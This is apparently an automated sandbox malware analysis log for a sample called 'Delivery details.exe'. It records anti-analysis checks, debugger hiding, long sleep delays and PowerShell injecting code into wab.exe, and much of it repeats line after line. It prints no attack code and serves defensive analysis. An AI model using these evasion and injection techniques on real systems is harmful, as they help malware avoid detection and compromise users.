              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 211A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21060000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598891Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598344Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597891Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597766Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597655Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597422Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597312Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597094Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596326Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596203Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595969Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595858Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595516Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595297Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595188Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595063Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594949Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594828Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594609Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594500Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5442Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3703Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 9086Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 726Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1480Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -23058430092136925s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599344s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598891s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598562s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598344s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598234s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598125s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -598015s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -597891s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -597766s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -597655s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -597531s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -597422s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -597312s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -597203s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -597094s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596984s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596875s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596765s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596656s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596547s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596437s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596326s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596203s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -596094s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595969s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595858s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595734s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595625s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595516s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595406s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595297s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595188s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -595063s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -594949s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -594828s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -594719s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -594609s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5828Thread sleep time: -594500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598891Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598344Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597891Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597766Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597655Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597422Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597312Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597094Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596326Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596203Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595969Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595858Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595516Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595297Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595188Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595063Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594949Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594828Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594609Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594500Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\akroterion\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: wab.exe, 00000006.00000002.3268060229.0000000005958000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3268060229.00000000059B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Delivery details.exeAPI call chain: ExitProcess graph end nodegraph_0-3592
              Source: C:\Users\user\Desktop\Delivery details.exeAPI call chain: ExitProcess graph end nodegraph_0-3748
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A5D044 LdrInitializeThunk,LdrInitializeThunk,6_2_02A5D044
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A8F8D8Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
